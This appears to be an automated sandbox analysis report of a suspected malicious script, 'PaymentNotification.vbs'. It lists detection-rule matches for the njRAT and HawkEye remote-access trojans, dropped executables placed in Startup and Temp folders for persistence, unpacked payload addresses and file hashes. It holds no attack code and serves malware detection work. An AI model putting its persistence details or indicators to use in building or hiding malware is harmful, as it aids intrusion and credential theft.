            Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
            Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPEDMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
            Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
            Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
            Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
            Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
            Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC5672 NtResumeThread,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC55CA NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC571A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC56ED NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC5590 NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeCode function: 1_2_00007FFD067D0ADD
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeCode function: 1_2_00007FFD067D36BD
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeCode function: 1_2_00007FFD067D1E55
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeCode function: 2_2_00A82238
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 3_2_00007FFD067E0ADD
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 3_2_00007FFD067E60AA
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 3_2_00007FFD067E36BD
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 3_2_00007FFD067E620C
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 3_2_00007FFD067E650D
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 3_2_00007FFD067E792A
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 3_2_00007FFD067E61D3
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 3_2_00007FFD067E1E55
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeCode function: 8_2_00007FFD06800ADD
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeCode function: 8_2_00007FFD06803985
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeCode function: 8_2_00007FFD06801E55
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_006E5DCA
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_00F4D5E0
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_00F49530
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_00F48C60
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_00F4F298
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_00F48918
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008AD426
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008BD5AE
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008AD523
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008B7646
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008E29BE
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008E6AF4
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_0090ABFC
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_00903CBE
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_00903C4D
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_00903DC0
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008AED03
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_00903D2F
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008ACF92
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008BAFA6
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_0102639C
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02C96048
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02C95758
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02C97C30
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02C97089
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02C97098
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02C91D9A
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02C91DA8
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008DC7BC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00404DDB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0040BD8A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00404E4C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00404EBD
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00404F4E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Tmp.exe 2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\pgr.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: String function: 008EBA9D appears 35 times
            Source: PaymentNotification.vbsInitial sample: Strings found which are bigger than 50
            Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
            Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
            Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
            Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
            Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
